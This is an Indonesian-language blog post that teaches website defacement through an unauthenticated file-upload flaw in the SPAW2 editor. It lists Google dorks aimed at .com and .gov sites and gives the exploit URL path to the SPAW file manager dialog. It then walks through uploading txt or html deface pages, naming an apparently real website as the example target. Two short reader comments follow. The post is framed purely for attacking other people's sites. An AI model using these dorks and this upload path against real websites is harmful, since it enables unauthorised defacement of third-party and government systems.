Deface Poc
Spawn File Upload
Kali ini Gw Mau Ngeshare Deface Dengan Poc Spawn file Upload.. Dipoc Ini Kita Cuman Bisa Nitip txt Dan html Doank.. Gk Ush Banyak Bacot Gaskenn Aja :
~Dork
inurl:/spaw2/uploads/files/ site:.com
inurl:/spaw2/uploads/files/ site:.gov (kembangin sndiri ya:v)
inurl:/spaw2/uploads/files/ site:.gov (kembangin sndiri ya:v)
~ Exploit
/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file
~ Script Deface ( html/txt )
Langkah awal kita dork kek bisanya digoogle
Kedua pilih salah websitenya trs kita msukan exploitnya..
Contoh : http://www.wholehealthamerica.com/spaw2/uploads/files/
Jadikan
http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file.. Pasti Nnti ada Tempat Buat upload File..
Contoh : http://www.wholehealthamerica.com/spaw2/uploads/files/
Jadikan
http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file.. Pasti Nnti ada Tempat Buat upload File..
Ketiga kita ubah tulisan flash image menjadi files.. Kemudian tinggal upload filenya aja..
Terakhir Cara manggil file kita http://web.nya/spaw2/uploads/files/file_kita.txt.. kalaw kita up file html tinggal ubh txtnya jadi html..
Done kan?? Kembangin dorknya biar bisa dapet yg fresh um:V"..
Sekian Dari Gw Thanks..
Gud om
BalasHapusGud Beb
BalasHapus